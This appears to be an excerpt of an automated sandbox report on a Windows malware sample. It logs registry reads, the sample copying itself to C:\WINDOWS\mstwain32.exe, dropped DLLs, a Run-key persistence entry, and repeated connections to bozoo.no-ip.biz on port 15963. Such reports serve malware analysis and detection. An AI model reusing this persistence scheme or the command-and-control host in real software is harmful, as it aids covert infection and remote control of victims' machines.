HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\music "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\music "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\music "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\note ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\note "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\note "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\note "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\picture ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\picture "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\picture "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\picture "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\presentation ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\presentation "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\presentation "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\presentation "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\program ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\program "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\program "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\program "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\spreadsheet ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\spreadsheet "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\spreadsheet "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\spreadsheet "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\text ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\text "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\text "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\text "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\video ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\video "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\video "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\video "ScriptOk"
HKEY_LOCAL_MACHINE\SYSTEM\WPA\MediaCenter "Installed"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared "CUAS"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Language Hotkey"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Layout Hotkey"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF "EnableAnchorContext"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IMM "Ime File"
HKEY_CURRENT_USER\Software\Microsoft\CTF "Disable Thread Input Manager"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum "0"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Scripting "Default Impersonation Level"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "Logging Directory"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "Logging"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "Log File Max Size"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "Repository Directory"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Scripting "Default Namespace"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "ProcessID"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "EnablePrivateObjectHeap"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "ContextLimit"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "ObjectLimit"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "IdentifierLimit"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{565783C6-CB41-11D1-8B02-00600806D9B6}\1.2\0 "win32"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared "CUAS"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Language Hotkey"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Layout Hotkey"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF "EnableAnchorContext"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IMM "Ime File"
HKEY_CURRENT_USER\Software\Microsoft\CTF "Disable Thread Input Manager"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system "EnableLUA"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\SecurityService "DefaultAuthLevel"
Enums HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Search\ProtocolHandlers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Search\ProtocolHandlers\File
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType
File Changes by all processes
New Files c:\tripeks.exe
C:\WINDOWS\mstwain32.exe
C:\WINDOWS\mstwain32.exe
C:\WINDOWS\ntdtcstp.dll
C:\WINDOWS\cmsetac.dll
\Device\RasAcd
Opened Files C:\WINDOWS\Registration\R000000000007.clb
\\.\PIPE\lsarpc
C:\WINDOWS\system32\wbem\wbemdisp.TLB
\\.\PIPE\lsarpc
C:\WINDOWS\VMPipe32.dll
C:\WINDOWS\mstwain32.exe
\\.\PIPE\wkssvc
C:\Programme\Windows Desktop Search\MSNLNamespaceMgr.dll
C:\WINDOWS\Registration\R000000000007.clb
C:\WINDOWS\AppPatch\sysmain.sdb
C:\WINDOWS\AppPatch\systest.sdb
\Device\NamedPipe\ShimViewer
C:\WINDOWS\
C:\WINDOWS\Registration\R000000000007.clb
\\.\PIPE\lsarpc
C:\WINDOWS\system32\wbem\wbemdisp.TLB
\\.\PIPE\lsarpc
C:\WINDOWS\VMPipe32.dll
Deleted Files
Chronological Order Create/Open File: c:\tripeks.exe (OPEN_ALWAYS)
Find File: c:\tripeks.exe
Get File Attributes: C:\WINDOWS\Registration Flags: (SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\Registration\R000000000007.clb (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\system32\WBEM\Logs\ Flags: (SECURITY_ANONYMOUS)
Open File: \\.\PIPE\lsarpc (OPEN_EXISTING)
Open File: C:\WINDOWS\system32\wbem\wbemdisp.TLB (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\system32\.HLP Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:\WINDOWS\Help\.HLP Flags: (SECURITY_ANONYMOUS)
Open File: \\.\PIPE\lsarpc (OPEN_EXISTING)
Open File: C:\WINDOWS\VMPipe32.dll (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\mstwain32.exe Flags: (SECURITY_ANONYMOUS)
Copy File: c:\tripeks.exe to C:\WINDOWS\mstwain32.exe
Find File: C:\WINDOWS\*.*
Open File: C:\WINDOWS\mstwain32.exe (OPEN_EXISTING)
Set File Time: C:\WINDOWS\mstwain32.exe
Open File: \\.\PIPE\wkssvc (OPEN_EXISTING)
Get File Attributes: c:\ Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:\WINDOWS\ Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:\Dokumente und Einstellungen\Administrator\Eigene Dateien\desktop.ini Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:\Dokumente und Einstellungen\All Users\Dokumente\desktop.ini Flags: (SECURITY_ANONYMOUS)
Open File: C:\Programme\Windows Desktop Search\MSNLNamespaceMgr.dll (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\Registration Flags: (SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\Registration\R000000000007.clb (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\mstwain32.exe:Zone.Identifier Flags: (SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\AppPatch\sysmain.sdb (OPEN_EXISTING)
Open File: C:\WINDOWS\AppPatch\systest.sdb (OPEN_EXISTING)
Open File: \Device\NamedPipe\ShimViewer (OPEN_EXISTING)
Open File: C:\WINDOWS\ ()
Find File: C:\WINDOWS\mstwain32.exe
Create/Open File: C:\WINDOWS\mstwain32.exe (OPEN_ALWAYS)
Find File: C:\WINDOWS\mstwain32.exe
Get File Attributes: C:\WINDOWS\Registration Flags: (SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\Registration\R000000000007.clb (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\system32\WBEM\Logs\ Flags: (SECURITY_ANONYMOUS)
Open File: \\.\PIPE\lsarpc (OPEN_EXISTING)
Open File: C:\WINDOWS\system32\wbem\wbemdisp.TLB (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\system32\.HLP Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:\WINDOWS\Help\.HLP Flags: (SECURITY_ANONYMOUS)
Open File: \\.\PIPE\lsarpc (OPEN_EXISTING)
Open File: C:\WINDOWS\VMPipe32.dll (OPEN_EXISTING)
Create File: C:\WINDOWS\ntdtcstp.dll
Create File: C:\WINDOWS\cmsetac.dll
Create/Open File: \Device\RasAcd (OPEN_ALWAYS)
Outgoing connection to remote server: bozoo.no-ip.biz TCP port 15963
Outgoing connection to remote server: bozoo.no-ip.biz TCP port 15963
Outgoing connection to remote server: bozoo.no-ip.biz TCP port 15963
Outgoing connection to remote server: bozoo.no-ip.biz TCP port 15963
Outgoing connection to remote server: bozoo.no-ip.biz TCP port 15963
Outgoing connection to remote server: bozoo.no-ip.biz TCP port 15963
Outgoing connection to remote server: bozoo.no-ip.biz TCP port 15963
Outgoing connection to remote server: bozoo.no-ip.biz TCP port 15963
Outgoing connection to remote server: bozoo.no-ip.biz TCP port 15963
Outgoing connection to remote server: bozoo.no-ip.biz TCP port 15963
Outgoing connection to remote server: bozoo.no-ip.biz TCP port 15963
Registry Changes by all processes
Create or Open
Changes HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "mstwain32" = C:\WINDOWS\mstwain32.exe
Reads HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared "CUAS"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Language Hotkey"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Layout Hotkey"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF "EnableAnchorContext"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IMM "Ime File"
HKEY_CURRENT_USER\Software\Microsoft\CTF "Disable Thread Input Manager"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum "0"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Scripting "Default Impersonation Level"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "Logging Directory"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "Logging"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "Log File Max Size"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "Repository Directory"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Scripting "Default Namespace"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "ProcessID"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "EnablePrivateObjectHeap"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "ContextLimit"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "ObjectLimit"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "IdentifierLimit"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{565783C6-CB41-11D1-8B02-00600806D9B6}\1.2\0 "win32"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared "CUAS"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Language Hotkey"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Layout Hotkey"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF "EnableAnchorContext"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IMM "Ime File"
HKEY_CURRENT_USER\Software\Microsoft\CTF "Disable Thread Input Manager"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system "EnableLUA"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "Logging"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "Logging Directory"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "Log File Max Size"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager\AppCompatibility "DisableAppCompat"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{56F9679E-7826-4C84-81F3-532071A8BCC5}\InprocServer32 ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Search\ProtocolHandlers\File\0 "ProgID"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\file "ShellFolder"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Mapi "ShellFolder"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Outlookexpress "ShellFolder"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\OTFS "ShellFolder"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Default ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Default "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Default "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Default "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.bmp ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.bmp "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.bmp "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.bmp "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.c ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.c "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.c "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.c "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cpp ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cpp "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cpp "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cpp "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cs ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cs "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cs "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cs "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cxx ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cxx "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cxx "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cxx "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.doc ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.doc "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.doc "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.doc "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.dot ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.dot "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.dot "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.dot "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.emf ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.emf "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.emf "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.emf "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.eml ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.eml "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.eml "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.eml "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.err ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.err "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.err "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.err "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.gif ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.gif "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.gif "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.gif "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.h ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.h "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.h "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.h "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.htm ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.htm "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.htm "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.htm "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.html ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.html "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.html "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.html "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.hxx ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.hxx "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.hxx "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.hxx "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.idl ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.idl "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.idl "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.idl "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jpeg ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jpeg "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jpeg "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jpeg "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jpg ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jpg "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jpg "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jpg "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jsl ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jsl "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jsl "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jsl "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.mht ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.mht "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.mht "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.mht "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.mhtml ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.mhtml "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.mhtml "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.mhtml "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.nws ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.nws "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.nws "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.nws "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pdf ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pdf "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pdf "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pdf "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.png ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.png "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.png "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.png "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pot ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pot "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pot "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pot "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pps ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pps "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pps "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pps "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.ppt ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.ppt "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.ppt "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.ppt "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.rtf ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.rtf "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.rtf "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.rtf "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.txt ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.txt "ContentType"
